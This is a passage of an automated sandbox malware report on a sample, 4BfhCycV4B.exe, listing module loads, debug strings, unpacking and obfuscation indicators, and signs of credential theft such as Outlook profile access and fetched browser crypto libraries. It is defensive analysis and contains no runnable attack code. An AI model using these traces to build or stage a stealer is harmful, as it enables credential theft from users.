                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winhttp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                            Source: pkrvj.7.drLNK file: ..\..\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: 4BfhCycV4B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: mozglue.pdbP source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303653067.0000013E35A20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2245242883.000000006C267000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000006.00000002.2309485282.000000006C267000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeUnpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeUnpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeUnpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeUnpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00416240
                            Source: fak.7.drStatic PE information: real checksum: 0x0 should be: 0xc94c3
                            Source: relay.dll.5.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: relay.dll.4.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: 4BfhCycV4B.exeStatic PE information: real checksum: 0x79e57 should be: 0x79e60
                            Source: Qg_Appv5.exe.0.drStatic PE information: section name: .didata
                            Source: u3z0.1.exe.0.drStatic PE information: section name: .didata
                            Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                            Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                            Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                            Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                            Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                            Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0042D355 push esi; ret 0_2_0042D35E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004275A4 push eax; ret 0_2_004275C2
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04221CA2 push dword ptr [esp+ecx-75h]; iretd 0_2_04221CA6
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421C52F push esp; retf 0_2_0421C537
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209F6D push ecx; ret 0_2_04209F80
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0422780B push eax; ret 0_2_04227829
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209A1D push ecx; ret 0_2_04209A30
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421CB2D push esp; retf 0_2_0421CB2E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F0C28 push ecx; iretd 0_2_042F0C3A
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F244D pushad ; retf 0_2_042F2454
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F2137 push 2B991403h; ret 0_2_042F213E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F2A5C push 00000061h; retf 0_2_042F2A64
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EFB9E pushad ; retf 0_2_042EFB9F
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004176C5 push ecx; ret 2_2_004176D8
